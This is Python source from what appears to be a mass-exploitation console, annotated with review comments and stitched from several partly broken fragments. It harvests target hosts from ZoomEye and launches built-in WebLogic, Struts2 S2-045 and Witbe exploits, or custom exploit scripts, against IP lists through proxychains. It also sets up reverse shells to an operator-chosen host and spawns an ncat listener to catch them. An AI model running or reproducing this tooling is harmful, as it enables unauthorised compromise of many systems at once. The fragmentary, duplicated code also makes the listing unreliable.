def main():
    '''
    Run the interactive console.

    Asks once which target list to use, then reads commands at the
    "mec > " prompt and passes each one to execute() until the operator
    leaves.
    '''
    use_default = str(
        input(colors.CYAN + '[?] Use ip_list.txt as target list? [y/n] ' +
              colors.END)).strip()
    if use_default.lower() == 'n':
        # List the data directory, then record the chosen file name for the
        # session. The command string is a constant; nothing typed by the
        # operator reaches os.system().
        os.system("ls data")
        SessionParameters.IP_LIST = console.input_check(
            '[=] Choose your target IP list, eg. ip_list.txt ',
            allow_blank=False)

    while True:
        try:
            # NOTE(review): this input() sits outside the inner try, and the
            # outer handler only names KeyboardInterrupt, so an EOFError
            # raised by the prompt itself propagates to the caller.
            cmd = input(
                colors.CYAN + colors.BOLD + colors.UNDERLINE + "\nmec" +
                colors.END + colors.CYAN + colors.BOLD + " > " + colors.END)
            try:
                execute(cmd)
            except (KeyboardInterrupt, EOFError, SystemExit):
                # NOTE(review): unlike the two Ctrl-C paths below, this exit
                # does not call check_kill_process('ss-proxy').
                sys.exit(0)
        except KeyboardInterrupt:
            # Ctrl-C at the prompt: ask for confirmation; a second Ctrl-C
            # while answering exits straight away.
            try:
                confirm = input("\n[?] Are you sure to exit? [y/n] ")
            except KeyboardInterrupt:
                print("\n[-] Okay okay, exiting immediately...")
                check_kill_process('ss-proxy')
                sys.exit(0)
            if confirm.lower() != 'y':
                continue
            check_kill_process('ss-proxy')
            sys.exit(0)
def api_test():
    '''
    Log in to ZoomEye and start one crawler thread per result page.

    Reads the wanted number of results from the operator, obtains an access
    token through ZoomEyeAPI('zoomeye.conf').login(), starts a progress
    thread on ZoomEyeAPI.OUTFILE and then starts the crawler threads.
    Returns early, after printing an error, when building the
    Authorization header raises TypeError.
    '''
    requested = console.input_check(
        "[*] How many results do you want? (10 IPs on each page) ",
        check_type=int)
    amnt = int(requested.strip())

    api = ZoomEyeAPI('zoomeye.conf')
    try:
        print(colors.BLUE + '[*] Crawling fetched pages from ZoomEye...' +
              colors.END)
        access_token = api.login()
        # The header carries the API credential and is passed to every
        # crawler thread below; treat it as a secret.
        headers = {'Authorization': 'JWT ' + access_token}
    except TypeError:
        console.print_error('[-] Invalid access token')
        return

    status = threading.Thread(target=progress, args=(ZoomEyeAPI.OUTFILE,))
    status.setDaemon(True)
    status.start()

    # range(1, k) stops at k - 1, so pages 1 .. int(amnt / 10) - 1 are
    # scheduled.
    workers = [
        threading.Thread(target=crawler,
                         args=(ZoomEyeAPI.QRY, amnt, page, headers))
        for page in range(1, int(amnt / 10))
    ]

    # Every tenth worker (index 0, 10, 20, ...) is joined right after it is
    # started; the others are daemon threads that are never joined here.
    for index, job in enumerate(workers):
        job.setDaemon(True)
        job.start()
        if index % 10 == 0:
            job.join()
# Tail of a thread start/join loop. The `for` header that binds `job` and the
# initialisation of `limit` are not part of this excerpt.
# NOTE(review): nesting below is reconstructed from a flattened listing.
job.setDaemon(True)
job.start()
if limit == 0 or limit == 10:
    # Reset the counter and wait for this one thread before continuing.
    limit = 0
    job.join()
limit += 1


def main():
    '''
    put things together

    Calls api_test() and prints a blank line afterwards.
    '''
    try:
        api_test()
        print('\n')
    except BaseException:
        # NOTE(review): BaseException also covers KeyboardInterrupt and
        # SystemExit, and `pass` discards the error, so any failure inside
        # api_test() ends this function silently.
        pass


if __name__ == '__main__':
    try:
        ZoomEyeAPI.QRY = console.input_check("[*] Your query is: ",
                                             allow_blank=False)
        # The output file name is built from the query text: ':' becomes '_'
        # and runs of whitespace become '-'.
        # NOTE(review): '/' is not filtered, so a query containing it yields
        # a path with extra components under ./data.
        ZoomEyeAPI.OUTFILE = './data/zoomeye-{}.txt'.format('-'.join(
            ZoomEyeAPI.QRY.replace(':', '_').split()))
        main()
    except (EOFError, KeyboardInterrupt, SystemExit):
        print('\n[*] Exiting...')
    else:
        # The else clause of a try statement runs only when the try body
        # raised nothing, so debug_traceback() is called after a normal run.
        # NOTE(review): main() already swallows BaseException; confirm
        # whether this was meant to be an `except` clause.
        debug_traceback()
def attack():
    '''
    handles attack command

    Interactive dispatcher. Records the proxychains answer in
    SessionParameters.USE_PROXY, then either passes one of the ExecExp
    built-in definitions to scanner() or collects a path, a process count
    and extra arguments from the operator and passes those to scanner().
    Contains no return statement.
    '''
    if input_check('[?] Do you wish to use proxychains? [y/n] ',
                   choices=['y', 'n']) == 'y':
        SessionParameters.USE_PROXY = True
    else:
        SessionParameters.USE_PROXY = False

    # NOTE(review): the `\ ` sequences in this prompt look like
    # backslash-newline continuations flattened by the listing; as written
    # they are invalid escapes. Restore the spacing from the original file.
    answ = input_check('\n[?] Do you wish to use\ \n\n [a] built-in exploits\ \n [m] or launch your own manually?\ \n\n[=] Your choice: ',
                       choices=['a', 'm'])

    if answ == 'a':
        print(colors.CYAN + colors.BOLD + '\n[?] Choose a module from: ' +
              colors.END + '\n')
        print(console.BUILT_IN)
        # The answer is compared as a string ('0'..'4') below.
        answ = input_check('[=] Your choice: ',
                           check_type=int,
                           choices=['0', '1', '2', '3', '4'])

        try:
            if answ == '2':
                console.print_error("\n[-] Under development")
            elif answ == '1':
                console.print_error('\n[-] Under development')
            elif answ == '0':
                scanner(ExecExp.weblogic())
            elif answ == '3':
                scanner(ExecExp.s2_045())
            elif answ == '4':
                scanner(ExecExp.witbe())
        except BaseException:
            # NOTE(review): BaseException includes KeyboardInterrupt and
            # SystemExit, so an operator interrupt during scanner() lands
            # here as well and is reported as a generic error.
            console.print_error("[-] We have an error executing exploit")
            debug_except()

    elif answ == 'm':
        print(colors.CYAN + colors.UNDERLINE + colors.BOLD +
              "\nWelcome, in here you can choose your own exploit\n" +
              colors.END)
        print(colors.CYAN + '[*] Here are available exploits:\n' + colors.END)
        list_exp()

        # The path is used as typed; no validation is visible in this block.
        exploit = input(
            "\n[*] Enter the path (eg. joomla/rce.py) of your exploit: "
        ).strip()

        jobs = int(
            input_check("[?] How many processes each time? ", check_type=int))

        custom_args = []
        answ = input_check("[?] Do you need a reverse shell [y/n]? ",
                           choices=['y', 'n'])
        if answ == 'y':
            lhost = input("[*] Where do you want me to send shells? ").strip()
            # lport is concatenated with str literals below, so it is kept as
            # text here rather than converted to int.
            lport = input_check(
                "[*] and at what port? (make sure you have access to that port) ",
                check_type=int)
            custom_args = ['-l', lhost, '-p', lport]
            answ = input_check(
                '[*] Do you need me to start a listener? [y/n] ',
                choices=['y', 'n'])
            if answ == 'y':
                print("\n[*] Spawning ncat listener in new window...\n")
                try:
                    # shell=False keeps Popen from invoking a shell, but the
                    # whole `--command=` value is one string built by
                    # concatenation with lport.
                    # NOTE(review): it stays well-formed only if
                    # input_check(check_type=int) accepts nothing but digits;
                    # input_check is not visible here, so confirm.
                    # stdout/stderr are piped and the Popen object is
                    # discarded, so nothing in this block reads them.
                    subprocess.Popen(args=[
                        "gnome-terminal",
                        "--command=ncat -nklvp " + lport + " -m 1000"
                    ],
                                     shell=False,
                                     stdout=subprocess.PIPE,
                                     stderr=subprocess.PIPE)
                except BaseException:
                    print(
                        colors.YELLOW +
                        "[-] Could not launch our listener, do you have GNOME-Terminal installed?"
                        + colors.END + '\n')
            # NOTE(review): nesting is reconstructed from a flattened listing;
            # this else is read as the "no listener" answer. Confirm against
            # the original file.
            else:
                print(
                    "[*] Okay, just make sure you receive the reverse shells\n"
                )
        else:
            pass

        # Extra arguments are split on whitespace and appended after any
        # -l/-p pair.
        custom_args += input(
            "[*] args for this exploit (target IP is handled already) ").strip(
            ).split()

        # exec_path drops the first path component and work_path drops the
        # last one: 'joomla/rce.py' gives exec_path 'rce.py' and work_path
        # 'joomla'. A path without '/' leaves both empty.
        exec_path = exploit.split('/')[1:]
        work_path = exploit.split('/')[:-1]
        delimtr = '/'
        exec_path = delimtr.join(exec_path)
        work_path = delimtr.join(work_path)
        delimtr = ' '

        # The preview is a fixed template: it always shows the proxychains4
        # prefix, whatever SessionParameters.USE_PROXY was set to above.
        print(
            colors.BLUE + '[*] Your exploit will be executed like\n' +
            colors.END,
            'proxychains4 -q -f proxy.conf {} -t <target ip>'.format(
                exec_path), delimtr.join(custom_args))

        scanner_args = (exploit, work_path, exec_path, custom_args, jobs)
        scanner(scanner_args)

    else:
        # Reached only if input_check returns something other than 'a' or
        # 'm'. NOTE(review): presumably unreachable when input_check enforces
        # `choices` - confirm.
        console.print_error('[-] Invalid input')